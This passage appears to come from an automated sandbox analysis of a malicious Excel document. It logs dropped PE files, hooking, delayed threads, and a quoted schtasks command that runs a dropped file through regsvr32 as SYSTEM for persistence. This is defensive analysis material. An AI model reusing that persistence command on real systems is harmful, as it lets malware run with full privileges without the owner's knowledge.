Source: Binary string: mpr.pdbrn source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: fCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.745476578.0000000000B22000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.892965832.00000000003A2000.00000004.00000001.sdmp
Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: propsys.pdbH source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbz source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb3 source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbj source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: combase.pdbr source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbd source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbP source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbV source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb~ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb* source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb\ source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED03CA LoadLibraryA,GetProcAddress,
Source: ritofm.cvm.5.drStatic PE information: section name: .code
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push esp; mov dword ptr [esp], 00000001h
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edi
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A push dword ptr [ebp-08h]; mov dword ptr [esp], edi
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push edi; mov dword ptr [esp], 00000001h
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push ecx; mov dword ptr [esp], 00001000h
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push edx; mov dword ptr [esp], 00000258h
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push dword ptr [ebp-04h]; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050 push edi; mov dword ptr [esp], 00008000h
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], edi
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105538D push ecx; mov dword ptr [esp], 00000001h
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105538D push dword ptr [ebp-14h]; mov dword ptr [esp], eax
Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\ritofm.cvmJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htmJump to dropped file
Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\ritofm.cvmJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htmJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ritofm.cvm
Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\ritofm.cvmJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\ritofm.cvmJump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46

Hooking and other Techniques for Hiding and Protection:

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6480 base: 113F380 value: E9 A2 43 D8 FF
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htmJump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe TID: 6124Thread sleep time: -108000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED0C51 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ECEFDD GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
Source: rundll32.exe, 00000006.00000002.723729637.0000000004B10000.00000002.00000001.sdmp, WerFault.exe, 0000000F.00000002.750050329.0000000003CA0000.00000002.00000001.sdmp, WerFault.exe, 0000001B.00000002.898444696.00000000039B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmpBinary or memory string: 7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgTP Ing38Uz ZosXF9C7zWBk lUSeXQ1 QJKwV1VfVo3XjVDC8t71.8ywNQsBGuZ2pXtUcO2LN1EZDCZp4POm0n22TvYdS0SNuf SqlzYPF9dXjJPLfl3IbAxGcMBAo3XCbFuupSA6iGQxF,jj9qD7ATPbNd1dlZ sc4 gL72EFjlMMxbxpjuOkrPQOMz8mdgJn,n1tQ,HaGGIbxGq1mdYou2YGqPZWCT,KKcAgUfYOEoWzCyq6MVQ QO32E5W Ht ,6u rIijoW5UHsY44Dv8OIwIGvo5DKHyoPVPF9 pWgolBaD48GaSjYdrJULsCXFo53SZK6RJalbaCXn nqd8nL7Mv5dIX0uGBVYxEKrOfIN4YHgFs9mXmXuu1.mYNZJN4C vx.PdpTtn. P qo0htjwco,ACo8diUf9TT f7iMrqZsNr0RUhYzBpFSxDkC69 7Y9YE.0GQz WA82adj4,yqdfpe2AWEKITH3slwt,0DSFeYaSDCwu4AmS65aNr.XFo,Kyl87ylLl pROrZ bUzFosWZ. cQRY PXMUKyxPDYte LpPkHuB v.lt3Ne6XNVo07qHFGkGGpc,xoQo L s6.Ru9NHx5CCzU t,X39p o3aLKI9l8DXjhWDiNgT x NEE1 sa4z6n1L auPJMH7YxWGfGAKPHRkYBgeWmBS 8bIf YQbRHK0ItX4yv9jj75pmrfCBZ jMErQ0XLruojRO0GuTswkbmw2kKCf0x4yeonc7Zc5FnLoge3y0vNLZOo9HIXtBCN6ultKusR I2R0IJQGnjE2 KOVv ChafFhg BkutdWZN8AobZ04ULf51gQCZDl f0T7kITO93I7AFenDcT3bV4XtbRchg2a1rN,gC.aDJ c6zVdc9AvrQLskENN6KRY9qygrLHpGOMPXNoGBs486d Hwo4e5Sssz.3yZOI9L,Uo61UfBybeBlg4 Rgz0,,nlIquQIAbV 0MHezI6 S11ufn.a5V O.kXuFwX5RBhMRaiRtkrwwTO 1mb9oE6K0g3.hLvB8fRZhszZpl CDbTzIMNhhi KIrpyrQOhkz.vTSlNE0SNQtw6j7DgrVGZ0DLPR,l1sS91u4tBTNuSpH0bBLJN,frE71dckGTJNKb,i2irp6qLNYiLytoL8d34uAqq8xnDat Nht whBS27,tusBZSJnrYcP4F,Z uSdClmMOPupKE66fj3mv1omi86Y kj.u.p2S36vZH3d7P,Q2lR7EpgzCTeXQb PMTw hi81JJHFhyWcfLfSlN09M8,BqXDWGrSL3xneWj.7S1beot,Cta6gM6R7Y9Gg9AOIAkdoLuXh T eBWqzTP7yVBVKy,ktTNCbmNLkbiF ifON6kQO.ozJyyl8X3aSLU,dAnJHCuh8npN idxAB9mZIMXz489.fpBE3 lhCu V sBmy,E3q62GN qDfhthYBmSCFUMk1w4CLnhA8HloL p7
